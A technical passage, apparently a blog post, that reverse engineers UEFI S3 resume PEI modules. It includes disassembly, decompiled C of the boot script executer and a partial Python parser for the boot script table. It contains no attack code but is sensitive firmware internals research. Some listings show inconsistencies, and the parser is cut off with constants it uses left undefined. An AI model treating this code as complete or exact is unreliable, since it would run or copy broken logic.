There are not many useful tools and IDA scripts for reverse engineering UEFI binaries. One project worth mentioning is EFI scripts for IDA Pro by @snare. Unfortunately, its rename_tables() and rename_structs() features (actually, the most desired ones) do not work for PEI modules, because EFI scripts for IDA Pro was designed mainly for the DXE stage. You can try to implement PEI support by adding proper handling of the EFI_PEI_SERVICES table to efiutils.py. Nevertheless, the GUID finding and renaming feature works well for all kinds of binaries, and you can also grab the UEFI data structure definitions as a single file, which is convenient for loading into IDA.

After manually propagating type information and renaming GUIDs, the assembly code of the module entry point looks pretty friendly:
.text:FFBB54EE ; EFI_STATUS __stdcall EntryPoint(PVOID FileHandle, EFI_PEI_SERVICES **ppPeiServices)
.text:FFBB54EE                 public EntryPoint
.text:FFBB54EE EntryPoint      proc near
.text:FFBB54EE
.text:FFBB54EE FileHandle      = dword ptr  4
.text:FFBB54EE ppPeiServices   = dword ptr  8
.text:FFBB54EE
.text:FFBB54EE                 push    esi
.text:FFBB54EF                 mov     esi, [esp+4+ppPeiServices]
.text:FFBB54F3                 push    esi
.text:FFBB54F4                 push    [esp+8+FileHandle]
.text:FFBB54F8                 call    RegisterBootScriptExecuter
.text:FFBB54FD                 mov     eax, [esi]
.text:FFBB54FF                 push    offset gEfiPeiS3ResumePpiDescriptor ; EFI_PEI_PPI_DESCRIPTOR *
.text:FFBB5504                 push    esi ; PEFI_PEI_SERVICES *
.text:FFBB5505                 call    [eax+EFI_PEI_SERVICES.InstallPpi]
.text:FFBB5508                 add     esp, 10h
.text:FFBB550B                 pop     esi
.text:FFBB550C                 retn
.text:FFBB550C EntryPoint      endp

.text:FFBB5D9C ; EFI_STATUS __cdecl RegisterBootScriptExecuter(PVOID FileHandle, EFI_PEI_SERVICES **ppPeiServices)
.text:FFBB5D9C RegisterBootScriptExecuter proc near
.text:FFBB5D9C
.text:FFBB5D9C ppPeiServices   = dword ptr  8
.text:FFBB5D9C
.text:FFBB5D9C                 mov     eax, [esp+ppPeiServices]
.text:FFBB5DA0                 mov     ecx, [eax]
.text:FFBB5DA2                 push    offset gEfiPeiBootScriptExecuterPpiDescriptor ; EFI_PEI_PPI_DESCRIPTOR *
.text:FFBB5DA7                 push    eax ; PEFI_PEI_SERVICES *
.text:FFBB5DA8                 call    [ecx+EFI_PEI_SERVICES.InstallPpi]
.text:FFBB5DAB                 pop     ecx
.text:FFBB5DAC                 pop     ecx
.text:FFBB5DAD                 retn
.text:FFBB5DAD RegisterBootScriptExecuter endp

.data:FFBB645C gEfiPeiS3ResumePpiGuid dd 4426CCB2h     ; Data1
.data:FFBB645C                 dw 0E684h               ; Data2
.data:FFBB645C                 dw 4A8Ah                ; Data3
.data:FFBB645C                 db 0AEh, 40h, 20h, 0D4h, 0B0h, 25h, 0B7h, 10h; Data4

.data:FFBB64A8 gEfiPeiS3ResumePpi EFI_PEI_S3_RESUME_PPI <0FFBB51BCh>

.data:FFBB64C8 gEfiPeiS3ResumePpiDescriptor EFI_PEI_PPI_DESCRIPTOR <80000010h, \
.data:FFBB64C8                                         offset gEfiPeiS3ResumePpiGuid, \
.data:FFBB64C8                                         offset gEfiPeiS3ResumePpi>

.data:FFBB6524 gEfiPeiBootScriptExecuterPpiGuid dd 0ABD42895h    ; Data1
.data:FFBB6524                 dw 78CFh                          ; Data2
.data:FFBB6524                 dw 4872h                          ; Data3
.data:FFBB6514                 db 9Dh, 0FCh, 6Ch, 0BFh, 5Eh, 0E2h, 2Ch, 2Eh; Data4

.data:FFBB6554 gEfiPeiBootScriptExecuterPpi EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI <0FFBB5608h>

.data:FFBB6558 gEfiPeiBootScriptExecuterPpiDescriptor EFI_PEI_PPI_DESCRIPTOR <80000010h, \
.data:FFBB6558                                         offset gEfiPeiBootScriptExecuterPpiGuid, \
.data:FFBB6558                                         offset gEfiPeiBootScriptExecuterPpi>

And C-like pseudocode for these functions:
EFI_STATUS __stdcall EntryPoint(PVOID FileHandle, EFI_PEI_SERVICES **ppPeiServices)
{
  RegisterBootScriptExecuter(FileHandle, ppPeiServices);

  // install S3 resume PPI
  return (*ppPeiServices)->InstallPpi(ppPeiServices, &gEfiPeiS3ResumePpiDescriptor);
}

EFI_STATUS __cdecl RegisterBootScriptExecuter(PVOID FileHandle, EFI_PEI_SERVICES **ppPeiServices)
{
  // install boot script executer PPI
  return (*ppPeiServices)->InstallPpi(ppPeiServices, &gEfiPeiBootScriptExecuterPpiDescriptor);
}

It's clear that after loading, this module registers two interfaces (more details about them are available in the specs):

  • EFI_PEI_S3_RESUME_PPI — PPI that accomplishes the firmware S3 resume boot path and transfers control to OS.
  • EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI — PPI that produces functions to interpret and execute the Framework boot script table.
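Both descriptors in the listing above carry the Flags value 80000010h. A small sketch that decodes it, using the EFI_PEI_PPI_DESCRIPTOR_* flag values as I know them from the PI specification (the short names and the `decode_ppi_flags` helper are mine):

```python
# EFI_PEI_PPI_DESCRIPTOR_* flag bits (prefix dropped for brevity).
PPI_DESCRIPTOR_FLAGS = {
    0x00000001: "PIC",
    0x00000010: "PPI",
    0x00000020: "NOTIFY_CALLBACK",
    0x00000040: "NOTIFY_DISPATCH",
    0x80000000: "TERMINATE_LIST",
}


def decode_ppi_flags(flags):
    """Return the names of all descriptor flag bits set in a Flags value."""
    return [
        name
        for bit, name in sorted(PPI_DESCRIPTOR_FLAGS.items())
        if flags & bit
    ]


print(decode_ppi_flags(0x80000010))  # ['PPI', 'TERMINATE_LIST']
```

In other words, each descriptor describes a regular PPI (not a notification) and is the last element of its list, so each InstallPpi() call installs exactly one interface.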

It’s also easy to figure out that the second module, file-92685943-d810-47ff-12a1-cc8490776a1f/section0.pe (which is actually the PEI core module according to its GUID), has a procedure sub_FFFCA505 that references EFI_PEI_S3_RESUME2_PPI_GUID. This procedure calls EFI_PEI_S3_RESUME2_PPI.S3RestoreConfig2() (if available) or EFI_PEI_S3_RESUME_PPI.S3RestoreConfig(). It seems that only the EFI_PEI_S3_RESUME_PPI interface is used on my test system.
EFI_STATUS __cdecl sub_FFFCA505(EFI_PEI_SERVICES **ppPeiServices)
{
  EFI_STATUS Result;
  EFI_STATUS Status;
  EFI_PEI_S3_RESUME2_PPI *pS3Resume2;
  EFI_PEI_S3_RESUME_PPI *pS3Resume;  

  // try to locate S3Resume2 PPI first
  if ((*ppPeiServices)->LocatePpi(
    ppPeiServices, &gEfiPeiS3Resume2PpiGuid, 0, &ppPeiServices, &pS3Resume2) & 0x80000000)
  {
    // try to use S3Resume PPI if fails
    Status = (*ppPeiServices)->LocatePpi(
      ppPeiServices, &gEfiPeiS3ResumePpiGuid, 0, &ppPeiServices, &pS3Resume
    );
    if (Status & 0x80000000)
    {
      (*ppPeiServices)->ReportStatusCode(ppPeiServices, 0x80000002u, 0x3038005u, 0, 0, 0);
      
      // unable to locate required PPI
      Result = Status;
    }
    else
    {
      // restore platform state
      Result = pS3Resume->S3RestoreConfig(ppPeiServices);
    }
  }
  else
  {
    // restore platform state
    Result = pS3Resume2->S3RestoreConfig2(pS3Resume2);
  }

  return Result;
}

Now let’s get back to the first PEI module. The Intel S3 Resume Boot Path Specification has a useful description of the actions that must be performed by an implementation of EFI_PEI_S3_RESUME_PPI.S3RestoreConfig():


This function will restore the platform to its preboot configuration that was prestored in EFI_ACPI_S3_RESUME_SCRIPT_TABLE and transfer control to OS waking vector. Upon invocation, this function is responsible for locating the following information before jumping to OS waking vector:

  • ACPI table
  • S3 resume boot script table
  • Any other information that it needs

All this necessary information should have been previously prepared by the EFI_ACPI_S3_SAVE_PROTOCOL.S3Save() function on a normal boot path. The S3RestoreConfig() function then executes the prestored boot script table by calling EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI.Execute() and transitions the platform to the preboot state. Finally, this function transfers control to the OS waking vector. If the OS supports only a real-mode waking vector, this function will switch from flat mode to real mode before jumping to the waking vector.


Here is the decompiled code of S3RestoreConfig(). To keep it simple I skipped a lot of stuff that doesn’t belong to the boot script table handling we are interested in:
EFI_STATUS __cdecl S3RestoreConfig(EFI_PEI_SERVICES **ppPeiServices)
{
  EFI_STATUS Result;
  EFI_STATUS Status;  
  EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI *pBootScriptExecuter;
  int AcpiGlobalVariable;
  __int64 pBootScript;

  EFI_PEI_SERVICES *pPeiServices = *ppPeiServices;
  pPeiServices->ReportStatusCode(ppPeiServices, 1, 0x3038000u, 0, 0, 0);

  // get boot script executer PPI
  Status = (*ppPeiServices)->LocatePpi(
    ppPeiServices, &gEfiPeiBootScriptExecuterPpiGuid, 0, 0, &pBootScriptExecuter
  );
  if (Status & 0x80000000)
  {
    (*ppPeiServices)->ReportStatusCode(ppPeiServices, 0x80000002u, 0x3038006u, 0, 0, 0);

    Result = Status;
  }
  else
  {
    // get ACPI global variable address
    AcpiGlobalVariable = sub_FFBB550D(ppPeiServices);
    if (AcpiGlobalVariable)
    {
      // get 64-bit boot script table address:
      // low dword is at offset 0x18, high dword is at offset 0x1C
      LODWORD(pBootScript) = *(unsigned int *)(AcpiGlobalVariable + 0x18);
      HIDWORD(pBootScript) = *(unsigned int *)(AcpiGlobalVariable + 0x1C);

      pPeiServices->ReportStatusCode(ppPeiServices, 1, 0x3038001u, 0, 0, 0);

      // execute boot script table
      if (pBootScriptExecuter->Execute(
        ppPeiServices, pBootScriptExecuter, pBootScript, HIDWORD(pBootScript), 0) & 0x80000000)
      {
        (*ppPeiServices)->ReportStatusCode(ppPeiServices, 0x80000002u, 0x3038006u, 0, 0, 0);
      }
      
      // ... skipped the rest part of S3 resume code ...

      Result = 0x80000003u;
    }
    else
    {
      (*ppPeiServices)->ReportStatusCode(ppPeiServices, 0x80000002u, 0x3038008u, 0, 0, 0);

      Result = 0x8000000Eu;
    }
  }

  return Result;
}

As we can see, this function gets the boot script table address from offset 0x18 of the ACPI global variable structure, and then calls another PPI (which is located inside the same PEIM and was registered earlier, during EntryPoint execution) to execute the boot script code. The function sub_FFBB550D(), which locates the address of the ACPI global variable, reads it from a 4-byte firmware variable with GUID af9ffd67-ec10-488a-9dfc-6cbf5ee22c2e:
int __cdecl sub_FFBB550D(EFI_PEI_SERVICES **ppPeiServices)
{
  EFI_PEI_SERVICES *pPeiServices = *ppPeiServices;
  EFI_PEI_READ_ONLY_VARIABLE2_PPI *pReadOnlyVariable2;
  EFI_STATUS Status;
  int v4 = 4; 
  int v5 = 0; 

  // locate EFI variable PPI
  pPeiServices->LocatePpi(
    ppPeiServices, &gEfiPeiReadOnlyVariable2PpiGuid, 0, 0, &pReadOnlyVariable2
  );

  // query variable value
  Status = pReadOnlyVariable2->GetVariable(
    pReadOnlyVariable2, L"AcpiGlobalVariable", &gAcpiGlobalVariableGuid, 0, &v4, &v5
  );

  return (Status & 0x80000000) == 0 ? v5 : 0;
}
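The decompiled listings above test `Status & 0x80000000` and return raw values like 0x80000003 or 0x8000000E. On a 32-bit build the high bit of EFI_STATUS marks an error and the low bits hold the error number. A minimal decoding sketch in Python; it covers only the codes that appear in this post and the helper names are hypothetical:

```python
EFI_ERROR_BIT = 0x80000000  # high bit of a 32-bit EFI_STATUS marks an error

# Only the error numbers that show up in the listings of this post.
EFI_ERROR_NAMES = {
    2: "EFI_INVALID_PARAMETER",
    3: "EFI_UNSUPPORTED",
    14: "EFI_NOT_FOUND",
}


def is_efi_error(status):
    """Equivalent of the (Status & 0x80000000) checks in the listings."""
    return bool(status & EFI_ERROR_BIT)


def status_name(status):
    """Return a readable name for a 32-bit EFI_STATUS value."""
    if status == 0:
        return "EFI_SUCCESS"
    if not is_efi_error(status):
        return "warning 0x%x" % status
    code = status & ~EFI_ERROR_BIT
    return EFI_ERROR_NAMES.get(code, "error 0x%x" % code)


print(status_name(0x8000000E))  # EFI_NOT_FOUND
```

Note that this applies to return values only. The 0x80000002 passed as the first argument of ReportStatusCode() is a status code type (as far as I can tell, an error code with major severity), not an EFI_STATUS.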

Now that the location of the current boot script table address is known, it’s possible to dump the table using the CHIPSEC framework (this tool will be described a bit later).
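Given a raw memory dump of the ACPI global variable structure, extracting the table address is a single unpack. A sketch under the assumption that the field is the little-endian 64-bit value that S3RestoreConfig() reads at offsets 0x18 and 0x1C; how the dump itself is obtained is not shown here, and the helper name is hypothetical:

```python
import struct

BOOT_SCRIPT_PTR_OFFSET = 0x18  # offset read by S3RestoreConfig() above


def boot_script_address(acpi_global_variable):
    """Extract the 64-bit boot script table address from a raw dump."""
    (address,) = struct.unpack_from(
        "<Q", acpi_global_variable, BOOT_SCRIPT_PTR_OFFSET
    )
    return address
```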

The first 0xD0 bytes of the boot script have the following contents:


Some obviously recognisable fields of the table entries are highlighted: red is the entry index, green is the entry size in bytes, blue is the opcode. At this point we can notice that this boot script format is pretty different from the reference implementation of the boot script table in the EDK2 source code (see EfiBootScript.h and PiDxeS3BootScriptLib).

Here is decompiled code of the EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI.Execute() function that implements boot script table parsing and execution:
EFI_STATUS __cdecl Execute(EFI_PEI_SERVICES **ppPeiServices, 
                           EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI *This, 
                           __int64 Address, int FvFile)
{
  unsigned int InstructionPtr;
  EFI_STATUS Result;
  EFI_STATUS Opcode;
  EFI_PEI_SERVICES *pPeiServices;

  // stack arguments that will be set by ParseInstruction() calls
  unsigned int v32; // [bp-64h]@10
  int v33; // [bp-5Eh]@70
  __int64 v34; // [bp-5Ch]@11
  __int64 v35; // [bp-54h]@15
  __int64 v36; // [bp-4Ch]@17
  int v37; // [bp-44h]@23
  int v38; // [bp-40h]@23

  EFI_PEI_SMBUS2_PPI *pSmbus2; 
  EFI_PEI_STALL_PPI *pStall;
  EFI_PEI_CPU_IO_PPI *pCpuIo;
  EFI_PEI_PCI_CFG_PPI *pPciCfg;

  EFI_PEI_PCI_CFG_PPI *pPciCfg_;
  EFI_PEI_PCI_CFG_PPI *pPciCfg__;

  InstructionPtr = Address;
  v49 = 0;

  if (FvFile)
    return 0x80000003u;

  if (!Address)
    return 0x80000002u;

  pCpuIo = (EFI_PEI_CPU_IO_PPI *)(*ppPeiServices)->CpuIo;
  pPciCfg = (EFI_PEI_PCI_CFG_PPI *)(*ppPeiServices)->PciCfg;

  if ((*ppPeiServices)->LocatePpi(ppPeiServices, &gEfiPeiSmbus2PpiGuid, 0, 0, &pSmbus2) & 0x80000000 || 
      (*ppPeiServices)->LocatePpi(ppPeiServices, &gEfiPeiStallPpiGuid, 0, 0, &pStall) & 0x80000000)
    goto LABEL_97;

  while (1)
  {
LABEL_7:
    
    InstructionPtr += 8;
    Opcode = *(unsigned char *)InstructionPtr;
    
    if (Opcode <= 128)
    {
      if (Opcode != 128)
      {
        switch (Opcode)
        {
          case 0:

            // EFI_BOOT_SCRIPT_IO_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x10u);
            v7 = InstructionPtr + 16;
            v8 = v7;
            if ((unsigned __int8)(BYTE1(v32) & 0xFC) == 4)
              v9 = 1;
            else
              v9 = v34;
            InstructionPtr = v9 * (unsigned __int8)(1 << (BYTE1(v32) & 3)) + v7;
            pCpuIo->IoRead16(ppPeiServices, pCpuIo, BYTE1(v32), HIWORD(v32), 0, v34, v8);
            continue;

          case 1:

            // EFI_BOOT_SCRIPT_IO_READ_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x18u);
            v10 = BYTE1(v32) & 3;
            InstructionPtr += 24;
            pCpuIo->IoRead8(ppPeiServices, pCpuIo, BYTE1(v32) & 3, HIWORD(v32), 0, 1, &v42);
            v42 = v34 | v42 & v35;
            pCpuIo->IoRead16(ppPeiServices, pCpuIo, v10, HIWORD(v32), 0, 1, &v42);
            continue;

          case 13:

            // vendor-specific opcode?
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
            InstructionPtr += 32;
            LODWORD(v11) = sub_FFBB5DE3(v36, HIDWORD(v36), 10, 0);
            v41 = v11 + 1;
            v49 = 1;
            goto LABEL_78;

          case 2:

            // EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x18u);
            v12 = InstructionPtr + 24;
            if ((unsigned __int8)(BYTE1(v32) & 0xFC) == 4)
              v13 = 1;
            else
              v13 = v35;
            v14 = v12;
            InstructionPtr = v13 * (unsigned __int8)(1 << (BYTE1(v32) & 3)) + v12;
            pCpuIo->Io(ppPeiServices, pCpuIo, BYTE1(v32), v34, HIDWORD(v34), v35, v14);
            continue;

          case 3:

            // EFI_BOOT_SCRIPT_MEM_READ_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
            v15 = BYTE1(v32) & 3;
            InstructionPtr += 32;
            pCpuIo->Mem(ppPeiServices, pCpuIo, BYTE1(v32) & 3, v34, HIDWORD(v34), 1, &v42);
            v42 = v35 | v42 & v36;
            pCpuIo->Io(ppPeiServices, pCpuIo, v15, v34, HIDWORD(v34), 1, &v42);
            continue;

          case 14:

            // vendor-specific opcode?
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x28u);
            InstructionPtr += 40;
            LODWORD(v16) = sub_FFBB5DE3(v37, v38, 10, 0);
            v41 = v16 + 1;
            v49 = 1;
            goto LABEL_90;

          case 11:

            // EFI_BOOT_SCRIPT_PCI_CONFIG2_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
            InstructionPtr += 32;
            if (v36)
              pPciCfg = (EFI_PEI_PCI_CFG_PPI *)sub_FFBB557D(ppPeiServices, v36);
            if (!pPciCfg)
              goto LABEL_97;
            v49 = 1;
            goto LABEL_28;

          case 4:

LABEL_28:
            // EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE
            if (!v49)
            {              
              ParseInstruction(&v32, (const void *)InstructionPtr, 0x18u);
              InstructionPtr += 24;
            }
            v44 = BYTE1(v32) & 3;
            v17 = __PAIR__(BYTE1(v32), (unsigned int)v35) & 0xFFFFFFFCFFFFFFFF;
            LOBYTE(v45) = 1 << (BYTE1(v32) & 3);
            v40 = v35;
            v48 = InstructionPtr;
            if ((unsigned __int8)(BYTE1(v32) & 0xFC) == 4)
              LODWORD(v17) = 1;
            v46 = 0;
            v18 = v17 * (unsigned __int8)(1 << (BYTE1(v32) & 3));
            InstructionPtr += v18;
            if (!v35)
              goto LABEL_41;
            break;

          case 12:

            // EFI_BOOT_SCRIPT_PCI_CONFIG2_READ_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x28u);
            InstructionPtr += 40;
            if (v37)
            {
              pPciCfg_ = sub_FFBB557D(ppPeiServices, v37);
              pPciCfg = pPciCfg_;
            }
            else
            {
              pPciCfg_ = pPciCfg;
            }
            if (!pPciCfg_)
              goto LABEL_97;
            v49 = 1;
            goto LABEL_50;

          case 5:

            // EFI_BOOT_SCRIPT_PCI_CONFIG_READ_WRITE_OPCODE
            pPciCfg_ = pPciCfg;
LABEL_50:
            if (!v49)
            {              
              ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
              InstructionPtr += 32;
            }
            v23 = BYTE1(v32) & 3;
            pPciCfg_->Read(ppPeiServices, pPciCfg_, BYTE1(v32) & 3, v34, HIDWORD(v34), &v42);
            v42 = v35 | v42 & v36;
            pPciCfg_->Write(ppPeiServices, pPciCfg_, v23, v34, HIDWORD(v34), &v42);
            if (!v49)
              continue;
            pPeiServices = *ppPeiServices;
            goto LABEL_43;

          case 16:

            // unknown vendor-specific opcode?
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x30u);
            InstructionPtr += 48;
            if (v39)
              pPciCfg = (EFI_PEI_PCI_CFG_PPI *)sub_FFBB557D(ppPeiServices, v39);
            if (!pPciCfg)
              goto LABEL_97;
            v49 = 1;
            goto LABEL_58;

          case 15:

LABEL_58:
            // unknown vendor-specific opcode?
            if (!v49)
            {              
              ParseInstruction(&v32, (const void *)InstructionPtr, 0x28u);
              InstructionPtr += 40;
              v49 = 1;
            }
            LODWORD(v24) = sub_FFBB5DE3(v37, v38, 10, 0);
            v41 = v24 + 1;
            goto LABEL_61;

          case 6:

            // EFI_BOOT_SCRIPT_SMBUS_EXECUTE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x17u);
            v26 = InstructionPtr + 23;
            InstructionPtr += *(_DWORD *)((char *)&v34 + 7) + 23;
            pSmbus2->Execute(
              pSmbus2, *(unsigned int *)((char *)&v32 + 2), v33,
              *(_DWORD *)((char *)&v34 + 2), *(_DWORD *)((char *)&v34 + 6),
              (char *)&v34 + 7, v26
            );
            continue;

          case 7:

            // EFI_BOOT_SCRIPT_STALL_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x10u);
            InstructionPtr += 16;
            pStall->Stall(ppPeiServices, pStall, v34);
            continue;

          case 8:

            // EFI_BOOT_SCRIPT_DISPATCH_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x10u);
            InstructionPtr += 16;
            goto LABEL_73;

          case 9:

            // EFI_BOOT_SCRIPT_MEM_POLL_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x18u);
            InstructionPtr += 24;
LABEL_73:
            ((void (__cdecl *)(_DWORD, PVOID *))v34)(0, ppPeiServices);
            continue;

          case 10:

            // EFI_BOOT_SCRIPT_INFORMATION_OPCODE
            InstructionPtr += 16;
            continue;

          default:

            goto LABEL_97;
        }

        while (1)
        {
          pPciCfg->Write(ppPeiServices, pPciCfg, v44, v34, HIDWORD(v34), v48);

          if (!HIDWORD(v17))
            break;

          if (HIDWORD(v17) == 4)
          {
            v48 += v18;
          }
          else
          {
            if (HIDWORD(v17) == 8)
              goto LABEL_39;
          }

LABEL_40:
          ++v46;

          if (v46 >= v40)
          {
LABEL_41:
            if (v49)
            {
              pPeiServices = *ppPeiServices;
              goto LABEL_43;
            }

            goto LABEL_7;
          }
        }

        v48 += v18;

LABEL_39:

        LODWORD(v19) = sub_FFBB5560(v34, HIDWORD(v34), v45);
        v34 = v19;
        goto LABEL_40;
      }

      if (!v49)
      {
        ParseInstruction(&v32, (const void *)InstructionPtr, 0x18u);
        InstructionPtr += 24;
      }

LABEL_78:

      v27 = BYTE1(v32) & 3;

      do
      {
        pCpuIo->IoRead8(ppPeiServices, pCpuIo, v27, HIWORD(v32), 0, 1, &v42);
        v42 &= v34;

        if (v49)
        {
          pStall->Stall(ppPeiServices, pStall, 1);
          v25 = __CFADD__((_DWORD)v41, -1);
          LODWORD(v41) = v41 - 1;
          HIDWORD(v41) = v25 + HIDWORD(v41) - 1;

          if (!v41)
            v42 = v35;
        }
      }
      while (v42 != v35);

LABEL_95:

      v49 = 0;
      continue;
    }

    v28 = Opcode - 0x81;

    if (!v28)
    {
      if (!v49)
      {
        ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
        InstructionPtr += 32;
      }

LABEL_90:

      v31 = BYTE1(v32) & 3;

      do
      {
        pCpuIo->Mem(ppPeiServices, pCpuIo, v31, v34, HIDWORD(v34), 1, &v42);
        v42 &= v35;

        if (v49)
        {
          pStall->Stall(ppPeiServices, pStall, 1);
          v25 = __CFADD__((_DWORD)v41, -1);
          LODWORD(v41) = v41 - 1;
          HIDWORD(v41) = v25 + HIDWORD(v41) - 1;

          if (!v41)
            v42 = v36;
        }
      }
      while (v42 != v36);

      goto LABEL_95;
    }

    v29 = v28 - 1;

    if (v29)
      break;

LABEL_61:

    if (!v49)
    {
      ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
      InstructionPtr += 32;
    }

    v44 = BYTE1(v32) & 3;

    do
    {
      pPciCfg->Read(ppPeiServices, pPciCfg, v44, v34, HIDWORD(v34), &v42);
      v42 &= v35;

      if (v49)
      {
        pStall->Stall(ppPeiServices, pStall, 1);
        v25 = __CFADD__((_DWORD)v41, -1);
        LODWORD(v41) = v41 - 1;
        HIDWORD(v41) = v25 + HIDWORD(v41) - 1;

        if (!v41)
          v42 = v36;
      }
    }
    while (v42 != v36);

    if (v49)
    {
      pPeiServices = *ppPeiServices;

LABEL_43:

      pPciCfg__ = (EFI_PEI_PCI_CFG_PPI *)*((_DWORD *)pPeiServices + 25);
      v49 = 0;
      pPciCfg = pPciCfg__;
    }
  }

  v30 = v29 - 1;

  if (!v30)
  {
    InstructionPtr += *(_DWORD *)(InstructionPtr + 4) + 8;
    goto LABEL_7;
  }

  if (v30 == 0x7C)
  {
    result = 0;
  }
  else
  {

LABEL_97:

    result = 0x80000003u;
  }

  return result;
}

Now we can recover the rest of the boot script table format from the above code and write a basic parser that is able to process EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE, EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE, EFI_BOOT_SCRIPT_IO_WRITE_OPCODE and EFI_BOOT_SCRIPT_DISPATCH_OPCODE, which is enough to decode the most interesting boot script table entries:
from struct import pack, unpack

def _at(data, off, size, fmt): return unpack(fmt, data[off : off + size])[0]

# helper functions for accessing binary structures data
def byte_at(data, off = 0): return _at(data, off, 1, 'B')
def word_at(data, off = 0): return _at(data, off, 2, 'H')
def dword_at(data, off = 0): return _at(data, off, 4, 'I')
def qword_at(data, off = 0): return _at(data, off, 8, 'Q')

class BootScriptParser(object):

    def __init__(self, quiet = False):

        self.quiet = quiet

    def value_at(self, data, off, width):

        # read boot script value of given type
        if width == self.EfiBootScriptWidthUint8: return byte_at(data, off)
        elif width == self.EfiBootScriptWidthUint16: return word_at(data, off)
        elif width == self.EfiBootScriptWidthUint32: return dword_at(data, off)
        elif width == self.EfiBootScriptWidthUint64: return qword_at(data, off)
        else: raise Exception('Invalid width 0x%x' % width)

    def width_size(self, width):

        # get actual size of the boot script value by size id
        if width == self.EfiBootScriptWidthUint8: return 1
        elif width == self.EfiBootScriptWidthUint16: return 2
        elif width == self.EfiBootScriptWidthUint32: return 4
        elif width == self.EfiBootScriptWidthUint64: return 8
        else: raise Exception('Invalid width 0x%x' % width)

    def log(self, data):

        if not self.quiet: print data

    def process_mem_write(self, width, addr, count, val):

        self.log(('Width: %s, Addr: 0x%.16x, Count: %d\n' + \
                  'Value: %s\n') % \
                 (self.boot_script_width[width], addr, count, \
                  ', '.join(map(lambda v: hex(v), val))))

    def process_pci_config_write(self, width, bus, dev, fun, off, count, val):

        self.log(('Width: %s, Count: %d\n' + \
                  'Bus: 0x%.2x, Device: 0x%.2x, Function: 0x%.2x, Offset: 0x%.2x\n' + \
                  'Value: %s\n') % \
                 (self.boot_script_width[width], count, bus, dev, fun, off, \
                  ', '.join(map(lambda v: hex(v), val))))

    def process_io_write(self, width, port, count, val):

        self.log(('Width: %s, Port: 0x%.4x, Count: %d\n' + \
                  'Value: %s\n') % \
                 (self.boot_script_width[width], port, count, \
                  ', '.join(map(lambda v: hex(v), val))))

    def process_dispatch(self, addr):

        self.log('Call addr: 0x%.16x' % (addr) + '\n')

    def read_values(self, data, width, count):

        values = []

        for i in range(0, count):

            # read single value of given width
            values.append(self.value_at(data, i * self.width_size(width), width))

        return values

    def parse(self, data, boot_script_addr = 0L):

        ptr = 0
        while data:

            # read boot script table entry header
            num, size, op = unpack('IIB', data[:9])      

            # check for the end of the table
            if op == 0xff:

                self.log('# End of the boot script at offset 0x%x' % ptr)
                break

            elif op >= len(self.boot_script_ops):

                raise Exception('Invalid op 0x%x' % op)

            self.log('#%d len=%d %s' % (num, size, self.boot_script_ops[op]))

            # process known opcodes
            if op == self.EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE:

                # get value information
                width, count = byte_at(data, 9), qword_at(data, 24)

                # get write address
                addr = qword_at(data, 16)

                # get values list
                values = self.read_values(data[32:], width, count)
               
                self.process_mem_write(width, addr, count, values)

            elif op == self.EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE:

                # get value information
                width, count = byte_at(data, 9), qword_at(data, 24)

                # get write address
                addr = qword_at(data, 16)               

                # get PCI device address
                bus, dev, fun, off = (addr >> 24) & 0xff, (addr >> 16) & 0xff, \
                                     (addr >> 8) & 0xff,  (addr >> 0) & 0xff               

                # get values list
                values = self.read_values(data[32:], width, count)

                self.process_pci_config_write(width, bus, dev, fun, off, count, values)

            elif op == self.EFI_BOOT_SCRIPT_IO_WRITE_OPCODE:

                # get value information
                width, count = byte_at(data, 9), qword_at(data, 16)

                # get I/O port number
                port = word_at(data, 10)

                # get values list
                values = self.read_values(data[24:], width, count)

                self.process_io_write(width, port, count, values)

            elif op == self.EFI_BOOT_SCRIPT_DISPATCH_OPCODE:

                # get call address
                addr = qword_at(data, 16)

                self.process_dispatch(addr)

            else:

                # skip unknown instruction
                pass

            # go to the next instruction
            data = data[size:]
            ptr += size

    EFI_BOOT_SCRIPT_IO_WRITE_OPCODE = 0x00
    EFI_BOOT_SCRIPT_IO_READ_WRITE_OPCODE = 0x01
    EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE = 0x02
    EFI_BOOT_SCRIPT_MEM_READ_WRITE_OPCODE = 0x03
    EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE = 0x04
    EFI_BOOT_SCRIPT_PCI_CONFIG_READ_WRITE_OPCODE = 0x05
    EFI_BOOT_SCRIPT_SMBUS_EXECUTE_OPCODE = 0x06
    EFI_BOOT_SCRIPT_STALL_OPCODE = 0x07
    EFI_BOOT_SCRIPT_DISPATCH_OPCODE = 0x08

    boot_script_ops = [
        'IO_WRITE',
        'IO_READ_WRITE',
        'MEM_WRITE',
        'MEM_READ_WRITE',
        'PCI_CONFIG_WRITE',
        'PCI_CONFIG_READ_WRITE',
        'SMBUS_EXECUTE',
        'STALL',
        'DISPATCH' ]

    EfiBootScriptWidthUint8 = 0
    EfiBootScriptWidthUint16 = 1
